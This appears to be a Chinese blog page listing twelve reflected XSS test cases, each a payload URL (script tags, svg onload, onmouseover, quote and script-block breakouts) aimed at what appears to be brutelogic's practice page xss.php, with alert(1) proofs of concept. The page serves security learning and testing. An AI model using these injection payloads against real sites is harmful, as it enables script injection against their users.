Single Reflection

Case 01 - Direct URL Injection (no parameter)

payload:

https://brutelogic.com.br/xss.php/"><script>alert(1)</script>

https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>

Case 02 - Simple HTML Injection (a)

https://brutelogic.com.br/xss.php?a=1"<script>alert(1)</script>

Case 03 - Inline HTML Injection with Double Quotes (b1)

https://brutelogic.com.br/xss.php?b1=1"><script>alert(1)</script>

https://brutelogic.com.br/xss.php?b1=1"><svg onload=alert(1)>

Case 04 - Inline HTML Injection with Single Quotes (b2)

https://brutelogic.com.br/xss.php?b2=1'><script>alert(1)</script>

https://brutelogic.com.br/xss.php?b2=1'><svg onload=alert(1)>

Case 05 - Inline HTML Injection with Double Quotes: No Tag Breaking (b3)

https://brutelogic.com.br/xss.php?b3=1" onmouseover=alert(1)//

鼠标移动到此处,就会触发XSS

Case 06 - Inline HTML Injection with Single Quotes: No Tag Breaking (b4)

https://brutelogic.com.br/xss.php?b4=1' onmouseover=alert(1)//

Case 07 - HTML Injection with Single Quotes in JS Block (c1)

https://brutelogic.com.br/xss.php?c1='</script><svg onload=alert(1)>

Case 08 - HTML Injection with Double Quotes in JS Block (c2)

https://brutelogic.com.br/xss.php?c2="</script><svg onload=alert(1)>//

Case 09 - Simple JS Injection with Single Quotes (c3)

https://brutelogic.com.br/xss.php?c3='-alert(1)-'

Case 10 - Simple JS Injection with Double Quotes (c4)

https://brutelogic.com.br/xss.php?c4="-alert(1)-"

Case 11 - Escaped JS Injection with Single Quotes (c5)

https://brutelogic.com.br/xss.php?c5=\'-alert(1)//

Case 12 - Escaped JS Injection with Double Quotes (c6)

https://brutelogic.com.br/xss.php?c6=\"-confirm(1)//

https://brutelogic.com.br/xss.php?c6=\"-alert(1)//

Source-Based XSS Test Cases的更多相关文章

  1. Portswigger web security academy:DOM Based XSS

    Portswigger web security academy:DOM Based XSS 目录 Portswigger web security academy:DOM Based XSS DOM ...

  2. DOM based XSS Prevention Cheat Sheet(DOM Based XSS防御检查单)

    本文为翻译版本,原文请查看 https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet 介绍 谈到XSS攻击,有三种公认的 ...

  3. DOM-based XSS Test Cases

    Case 23 - DOM Injection via URL parameter (by server + client) https://brutelogic.com.br/dom/dom.php ...

  4. XSS (Cross Site Scripting) Prevention Cheat Sheet(XSS防护检查单)

    本文是 XSS防御检查单的翻译版本 https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sh ...

  5. XSS Overview

    什么是XSS? 跨站脚本攻击(Cross Site Scripting):攻击者往Web页面里插入恶意脚本,当用户浏览该页面时,嵌入页面的脚本代码会被执行,从而达到恶意攻击用户的特殊目的.恶意的内容通 ...

  6. XSS测试代码

    无script的Xss <img/src=# onerror=alert('XSS')> HTML5  XSS测试代码 <video> <source onerror=” ...

  7. XSS CSS Cross SiteScript 跨站脚本攻击

    XSS攻击及防御 - 高爽|Coder - CSDN博客 https://blog.csdn.net/ghsau/article/details/17027893 XSS又称CSS,全称Cross S ...

  8. The Top 50 Proprietary Programs that Drive You Crazy — and Their Open Source Alternatives

    The Top 50 Proprietary Programs that Drive You Crazy — and Their Open Source Alternatives 01 / 22 / ...

  9. 这一次,彻底理解XSS攻击

    希望读完本文大家彻底理解XSS攻击,如果读完本文还不清楚,我请你吃饭慢慢告诉你~ 话不多说,我们进入正题. 一.简述 跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠 ...

随机推荐

  1. Scrapy爬虫遇到 ‘Forbidden by robots.txt’的问题

    今天在爬知乎精华时,出现了‘Forbidden by robots.txt’的问题 了解到到scrapy在爬取设定的url之前,它会先向服务器根目录请求一个txt文件,这个文件规定了爬取范围 scra ...

  2. 《k8s-1.13版本源码分析》- Scheduler启动前逻辑

    本文原始地址(gitbook格式):https://farmer-hutao.github.io/k8s-source-code-analysis/core/scheduler/before-sche ...

  3. netcore使用 jenkins + supervisor 实现standalone下多副本自动化发布

    上一篇我们用jenkins做了一个简单的自动化发布,在shell中采用的是 BUILD_ID=dontKillMe nohup dotnet xxx.dll &  这种简单的后台承载,如果你的 ...

  4. JVM利器:Serviceability Agent介绍

    本文首发于公众号:javaadu 简单介绍 构建高性能的Java应用过程中,必然会遇到各种各样的问题,像CPU飙高.内存泄漏.应用奔溃,以及其他疑难杂症,这时可以使用Serviceability Ag ...

  5. 不一样的 SQL Server 日期格式化

    不一样的 SQL Server 日期格式化 Intro 最近统计一些数据,需要按天/按小时/按分钟来统计,涉及到一些日期的格式化,网上看了一些文章大部分都是使用 CONVERT 来转换的,SQL Se ...

  6. 加载静态界面----,要不要会加载cookie和页面参数

    Server.Transfer(string.Format("/shouji/StaticHtml/RobLine/{0}.html", id),true); 加cookie. S ...

  7. Beyond Compare 3.3.8 build 16340 + Key

    本文摘录自冰点社区:http://forum.z27315.com/topic/14746-beyond-compare-338-build-16340-key/ Download Beyond Co ...

  8. 【STM32H7教程】第2章 STM32H7的开发环境搭建

    完整教程下载地址:http://forum.armfly.com/forum.php?mod=viewthread&tid=86980 第2章    STM32H7的开发环境搭建 本章主要为大 ...

  9. spring mvc多个请求的影响 和使用全局变量

    对于那些会以多线程运行的单例类(比如spring mvc中的controller,dao,service): 局部变量不会受多线程影响 成员变量会受到多线程影响 如果方法里有成员变量,只有读操作,不受 ...

  10. PHP全栈学习笔记15

    PHP标记风格 PHP一共支持4种标记风格 <?php echo "这是XML风格的标记"; ?> 脚本风格 <script language="php ...